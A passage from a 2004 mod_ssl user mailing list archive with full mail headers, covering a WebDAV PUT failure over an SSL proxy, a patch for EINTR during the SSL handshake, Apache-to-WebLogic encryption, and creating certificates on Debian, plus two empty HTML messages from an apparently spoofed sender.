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

--_===285758567====mail01.infosat.net===_--

From owner-modssl-users@modssl.org  Thu Apr 15 18:42:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E8FE1A898B; Thu, 15 Apr 2004 18:42:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (imap.gmx.net [213.165.64.20])
	by master.modssl.org (Postfix) with SMTP id 6CAF7A8945
	for ; Thu, 15 Apr 2004 18:41:54 +0200 (CEST)
Received: (qmail 5547 invoked by uid 65534); 15 Apr 2004 16:41:46 -0000
Received: from 217-68-167-99.cable.primacom.net (EHLO michael64) (217.68.167.99)
  by mail.gmx.net (mp027) with SMTP; 15 Apr 2004 18:41:46 +0200
X-Authenticated: #216356
From: "Michael Pfannkuchen" 
To: 
Subject: AW: PUT Request failing with sslproxy ( https -> http )
Date: Thu, 15 Apr 2004 18:42:06 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Thread-Index: AcQhb85Vh4dzpkKpTiqEvjQbjGnTogAA9VowAGTkX/A=
In-Reply-To: <20040413232946.DCC18A8962@master.modssl.org>
Message-Id: <20040415164154.6CAF7A8945@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael Pfannkuchen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hm,

as follow-up to my last posting ... if I use WebDrive (
http://www.webdrive.com ) to connect to my WebDav site, it's working
perfectly without any trouble ... (let alone the problem, that my Norton
Personal Firewall seems in no case willing to allow =
WebDrive-SSL-connections
).

Very strange ... anyone knows about debugging or configuring Windows
Explorers WebDAV folders ? ( "Microsoft Data Access Internet Publishing
Provider DAV" )

thx4all : michael

-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org] Im
Auftrag von Michael Pfannkuchen
Gesendet: Mittwoch, 14. April 2004 01:30
An: modssl-users@modssl.org
Betreff: PUT Request failing with sslproxy ( https -> http )

Hi,


does anyone have an explanation for the following behaviour:

We implemented a customized Webdav Server based on
PHP-Pear::HTTP::WebDAV_Server, running with Apache HTTP Server.

-> This works well with Windows Explorer (Webfolder) and non-SSL=20
-> connections
like http://iprobe.iklk.de/phprojekt-4.1/webdav.php/

-> It also works fine with most requests over SSL(proxy):
https://ssl.iklk.de/iprobe/phprojekt-4.1/webdav.php/

->> But the problem is: PUT requests over SSL will always produce an
unspecified error message "Beim Kopieren einer oder allen der =
ausgewaehlten
Dateien ist ein Fehler aufgetreten" (maybe translated as "Error during
copying one or more selected files").
If you look into Apache sslproxy logfile you see there is something =
wrong
with copying a file to the Webdav folder ...=20
----
[13/Apr/2004:18:56:32 +0200] 217.68.167.99 SSLv2 DES-CBC3-MD5 "HEAD
/phprojekt-4.1/webdav.php/Hochschulpolitik/p1.pdf HTTP/1.1" 200 - =
"Microsoft
Data Access Internet Publishing Provider DAV"
[13/Apr/2004:18:56:44 +0200] 217.68.167.99 SSLv2 DES-CBC3-MD5 "PUT
/phprojekt-4.1/webdav.php/Hochschulpolitik/p1.pdf HTTP/1.1" 70014 660
"Microsoft Data Access Internet Publishing Provider DAV"
----
... HEAD works ok, but PUT is getting back response code '70014' ! (ups =
...)


Any ideas what could happen here?



thx4all : michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 15 19:50:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DFE67A8945; Thu, 15 Apr 2004 19:50:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web80803.mail.yahoo.com (web80803.mail.yahoo.com [66.163.170.98])
	by master.modssl.org (Postfix) with SMTP id 078ECA8938
	for ; Thu, 15 Apr 2004 19:49:53 +0200 (CEST)
Message-ID: <20040415174944.69070.qmail@web80803.mail.yahoo.com>
Received: from [80.67.64.10] by web80803.mail.yahoo.com via HTTP; Thu, 15 Apr 2004 10:49:44 PDT
Date: Thu, 15 Apr 2004 10:49:44 -0700 (PDT)
From: a k 
Subject: Fwd: Bug and fix in handshake negotiation - apache 1.x series (2.8.16-1.3.29)
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-1631972726-1082051384=:67103"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a k 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1631972726-1082051384=:67103
Content-Type: text/plain; charset=us-ascii
Content-Id: 
Content-Disposition: inline


Note: forwarded message attached.



	
		
__________________________________
Do you Yahoo!?
Yahoo! Tax Center - File online by April 15th
http://taxes.yahoo.com/filing.html
--0-1631972726-1082051384=:67103
Content-Type: message/rfc822

Received: from [80.67.64.10] by web80801.mail.yahoo.com via HTTP; Thu, 15 Apr 2004 10:10:11 PDT
Date: Thu, 15 Apr 2004 10:10:10 -0700 (PDT)
From: a k 
Subject: Bug and fix in handshake negotiation - apache 1.x series (2.8.16-1.3.29)
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 481

If an interrupt (EINTR) occurs during the handshake
the current code will abort the handshake with:

                ssl_log(srvr,
SSL_LOG_ERROR|SSL_ADD_SSLERR|SSL_ADD_ERRNO,
                        "SSL handshake failed (server
%s, client %s)", cpVHostID,
                        conn->remote_ip != NULL ?
conn->remote_ip : "unknown");

-- the following will fix this problem:

                int err;

                err = SSL_get_error(ssl, rc);
                if( err == SSL_ERROR_WANT_READ &&
                                 
BIO_should_retry(SSL_get_rbio(ssl)) ) {
                    ssl_log(srvr,SSL_LOG_INFO,"SSL
READ ERROR IGNORED on pid (%d)\n",getpid());
                    continue;
                } else if( err == SSL_ERROR_WANT_WRITE
&&
                                 
BIO_should_retry(SSL_get_wbio(ssl)) ) {
                    ssl_log(srvr,SSL_LOG_INFO,"SSL
READ ERROR IGNORED on pid (%d)\n",getpid());
                    continue;
                }




	
		
__________________________________
Do you Yahoo!?
Yahoo! Tax Center - File online by April 15th
http://taxes.yahoo.com/filing.html

--0-1631972726-1082051384=:67103--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 16 14:45:27 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7584BA8962; Fri, 16 Apr 2004 14:45:27 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.rsv.se (smtp1.rsv.se [137.61.237.10])
	by master.modssl.org (Postfix) with ESMTP id E78AAA893B
	for ; Fri, 16 Apr 2004 14:45:08 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by smtp3.rsv.se (Postfix) with ESMTP id 9659B112F
	for ; Fri, 16 Apr 2004 14:44:59 +0200 (METDST)
Date: Fri, 16 Apr 2004 11:36:10 +0200 (METDST)
From: Ringaby Anders 
X-X-Sender:  
To: 
Subject: Encryption and weblogic module
In-Reply-To: <006301c422c5$b3ea6080$7621a8c0@mlamot>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Virus-Scanned: by amavisd-new at rsv.se
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ringaby Anders 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users



Hello everyone.

I am quite new to ssl, so I have a question.

While a connection between a pc client and
a web server is encrypted, I do not know if
the connection that may result thereafter is
encrypted too, that is, if ssl.conf contain
an entry that look like this:


 SetHandler weblogic-handler
 WebLogicCluster host1.dom.dom.se:99999,host2.dom.dom.se:99999
 ErrorPage /xx/xxx/xxx/xxx/errpage.html


Is the data that is sent and received between the
webserver and host1/2.dom.dom.se also encrypted, and
is there a way to check that ?

Or is the question about encryption something that
(in this case) the weblogic module (that Apache uses)
is responsible for ?


Regards

Anders





______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 16 15:11:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2068EA89E6; Fri, 16 Apr 2004 15:11:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web60707.mail.yahoo.com (web60707.mail.yahoo.com [216.109.117.230])
	by master.modssl.org (Postfix) with SMTP id 71D3BA893D
	for ; Fri, 16 Apr 2004 15:11:17 +0200 (CEST)
Message-ID: <20040416131057.40506.qmail@web60707.mail.yahoo.com>
Received: from [62.129.121.32] by web60707.mail.yahoo.com via HTTP; Fri, 16 Apr 2004 06:10:57 PDT
Date: Fri, 16 Apr 2004 06:10:57 -0700 (PDT)
From: Matt Stevenson 
Subject: Re: Encryption and weblogic module
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Matt Stevenson 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

AFAIK the apache-weblogic connection isn't encrypted.
And yes if encrypted it would be weblogic modules
responsibilty. You can check with a tcpdump (use
ethereal on Linux/Unix). You could use Stunnel to
create an SSL tunnel between the apache and weblogic
boxes. How well this works I don't know.

Regards
Matt

--- Ringaby Anders  wrote:
> 
> 
> Hello everyone.
> 
> I am quite new to ssl, so I have a question.
> 
> While a connection between a pc client and
> a web server is encrypted, I do not know if
> the connection that may result thereafter is
> encrypted too, that is, if ssl.conf contain
> an entry that look like this:
> 
> 
>  SetHandler weblogic-handler
>  WebLogicCluster
> host1.dom.dom.se:99999,host2.dom.dom.se:99999
>  ErrorPage /xx/xxx/xxx/xxx/errpage.html
> 
> 
> Is the data that is sent and received between the
> webserver and host1/2.dom.dom.se also encrypted, and
> is there a way to check that ?
> 
> Or is the question about encryption something that
> (in this case) the weblogic module (that Apache
> uses)
> is responsible for ?
> 
> 
> Regards
> 
> Anders
> 
> 
> 
> 
> 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)               
>    www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
majordomo@modssl.org



	
		
__________________________________
Do you Yahoo!?
Yahoo! Tax Center - File online by April 15th
http://taxes.yahoo.com/filing.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 16 15:25:11 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 607F1A8962; Fri, 16 Apr 2004 15:25:11 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id BA2C4A893B
	for ; Fri, 16 Apr 2004 15:24:54 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 70AEF3F878; Fri, 16 Apr 2004 06:48:08 -0700 (PDT)
Date: Fri, 16 Apr 2004 06:48:08 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Encryption and weblogic module
Message-ID: <20040416134808.GA19537@rawbyte.com>
References: <006301c422c5$b3ea6080$7621a8c0@mlamot> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


client ----(a)----->  Apache -----(b)---->  Weblogic

If the client connects to Apache using SSL, (a) will be encrypted but (b)
will not (unless you can configure mod_wl to use SSL, which I dont believe
you can). the assumption is that (b) is occurring over a private, trusted
network. If you need to encrypt (b) I would suggest either setting up a VPN
or using Apache as a reverse proxy with SSL (the weblogic protocol in modern
versions is basically HTTP with a couple of extra headers)

cheers

Daniel

> Hello everyone.
> 
> I am quite new to ssl, so I have a question.
> 
> While a connection between a pc client and
> a web server is encrypted, I do not know if
> the connection that may result thereafter is
> encrypted too, that is, if ssl.conf contain
> an entry that look like this:
> 
> 
>  SetHandler weblogic-handler
>  WebLogicCluster host1.dom.dom.se:99999,host2.dom.dom.se:99999
>  ErrorPage /xx/xxx/xxx/xxx/errpage.html
> 
> 
> Is the data that is sent and received between the
> webserver and host1/2.dom.dom.se also encrypted, and
> is there a way to check that ?
> 
> Or is the question about encryption something that
> (in this case) the weblogic module (that Apache uses)
> is responsible for ?
> 
> 
> Regards
> 
> Anders
> 
> 
>
--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 16 15:47:54 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E6EDAA8958; Fri, 16 Apr 2004 15:47:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp.esilicon.com (smtp.esilicon.com [65.223.67.137])
	by master.modssl.org (Postfix) with ESMTP id 10F26A893D
	for ; Fri, 16 Apr 2004 15:47:37 +0200 (CEST)
Received: from mail00.sc.esilicon.com ([10.1.5.36]) by smtp.esilicon.com with Microsoft SMTPSVC(5.0.2195.6713);
	 Fri, 16 Apr 2004 06:47:26 -0700
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: Encryption and weblogic module
Date: Fri, 16 Apr 2004 06:47:26 -0700
Message-ID: <42B8E37890B1E64CB427CE1F260181EA6677A6@mail00.sc.esilicon.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Encryption and weblogic module
Thread-Index: AcQjtkUfiHYTofnPQXyQsQ6V7Nf01QAAiCZQ
From: "David Marshall" 
To: 
X-OriginalArrivalTime: 16 Apr 2004 13:47:26.0379 (UTC) FILETIME=[5A47BFB0:01C423B9]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Marshall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Weblogic used to provide an ssl version of the mod_wl module, I think it
was named mod_wl_ssl. Obtaining the correct mod_wl_ssl may be dependent
on  which version of weblogic  and apache are being used.

We have run this configuration on Apache 1.x

client --> FireWall -->  Apache --> Firewall --->  Weblogic
          only port 443  mod_wl_ssl   port nnnn
                                    is configurable

David

-----Original Message-----
From: Daniel Lopez [mailto:daniel@rawbyte.com]=20
Sent: Friday, April 16, 2004 6:48 AM
To: modssl-users@modssl.org
Subject: Re: Encryption and weblogic module


client ----(a)----->  Apache -----(b)---->  Weblogic

If the client connects to Apache using SSL, (a) will be encrypted but
(b)
will not (unless you can configure mod_wl to use SSL, which I dont
believe
you can). the assumption is that (b) is occurring over a private,
trusted
network. If you need to encrypt (b) I would suggest either setting up a
VPN
or using Apache as a reverse proxy with SSL (the weblogic protocol in
modern
versions is basically HTTP with a couple of extra headers)

cheers

Daniel

> Hello everyone.
>=20
> I am quite new to ssl, so I have a question.
>=20
> While a connection between a pc client and
> a web server is encrypted, I do not know if
> the connection that may result thereafter is
> encrypted too, that is, if ssl.conf contain
> an entry that look like this:
>=20
> 
>  SetHandler weblogic-handler
>  WebLogicCluster host1.dom.dom.se:99999,host2.dom.dom.se:99999
>  ErrorPage /xx/xxx/xxx/xxx/errpage.html
> 
>=20
> Is the data that is sent and received between the
> webserver and host1/2.dom.dom.se also encrypted, and
> is there a way to check that ?
>=20
> Or is the question about encryption something that
> (in this case) the weblogic module (that Apache uses)
> is responsible for ?
>=20
>=20
> Regards
>=20
> Anders
>=20
>=20
>
--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 16 16:18:24 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 724B4A89B8; Fri, 16 Apr 2004 16:18:24 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 0E37FA8962
	for ; Fri, 16 Apr 2004 16:18:08 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id 5CEC6412B2; Fri, 16 Apr 2004 07:41:24 -0700 (PDT)
Date: Fri, 16 Apr 2004 07:41:24 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: Encryption and weblogic module
Message-ID: <20040416144124.GA19861@rawbyte.com>
References: <42B8E37890B1E64CB427CE1F260181EA6677A6@mail00.sc.esilicon.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <42B8E37890B1E64CB427CE1F260181EA6677A6@mail00.sc.esilicon.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


But that module is for when Apache has been compiled with SSL (EAPI
patches) does not provide SSL support.

> Weblogic used to provide an ssl version of the mod_wl module, I think it
> was named mod_wl_ssl. Obtaining the correct mod_wl_ssl may be dependent
> on  which version of weblogic  and apache are being used.
> 
> We have run this configuration on Apache 1.x
> 
> client --> FireWall -->  Apache --> Firewall --->  Weblogic
>           only port 443  mod_wl_ssl   port nnnn
>                                     is configurable
> 
> David
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 18 02:40:44 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8576EA8978; Sun, 18 Apr 2004 02:40:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from david187.org (dcn235-241.dcn.davis.ca.us [168.150.235.241])
	by master.modssl.org (Postfix) with SMTP id 0A47CA893B
	for ; Sun, 18 Apr 2004 02:40:43 +0200 (CEST)
Date: Sat, 17 Apr 2004 17:40:14 -0800
To: modssl-users@modssl.org
Subject: Re: Msg reply
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 18 03:18:42 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2F361A8978; Sun, 18 Apr 2004 03:18:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from david187.org (dcn235-241.dcn.davis.ca.us [168.150.235.241])
	by master.modssl.org (Postfix) with SMTP id 8D8D5A8933
	for ; Sun, 18 Apr 2004 03:18:40 +0200 (CEST)
Date: Sat, 17 Apr 2004 18:10:39 -0800
To: modssl-users@modssl.org
Subject: Encrypted document
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users






______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 18 06:26:50 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E7FF7A8978; Sun, 18 Apr 2004 06:26:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc11.comcast.net (rwcrmhc11.comcast.net [204.127.198.35])
	by master.modssl.org (Postfix) with ESMTP id 243A7A893B
	for ; Sun, 18 Apr 2004 06:26:33 +0200 (CEST)
Received: from compnick (pcp03144331pcs.midval01.tn.comcast.net[68.59.247.15])
          by comcast.net (rwcrmhc11) with SMTP
          id <2004041804262201300fbpg4e>; Sun, 18 Apr 2004 04:26:22 +0000
From: "Linux Nick" 
To: 
Subject: SSL certs
Date: Sun, 18 Apr 2004 00:26:08 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0076_01C424DB.BEE409B0"
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Thread-Index: AcQk/UWjQrvl8iNFQeiA6h5D4x+IHg==
Message-Id: <20040418042633.243A7A893B@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Linux Nick" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0076_01C424DB.BEE409B0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 7bit

Does anyone know of an easy way to create ssl certs and keys in debian? Im
having a time with it.

 

 

Nick

 


------=_NextPart_000_0076_01C424DB.BEE409B0
Content-Type: text/html;
	charset="US-ASCII"
Content-Transfer-Encoding: quoted-printable
















Does anyone know of an easy way to create ssl certs =
and keys
in debian? Im having a time with it.



 



 



Nick



 









------=_NextPart_000_0076_01C424DB.BEE409B0--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Apr 18 08:45:26 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
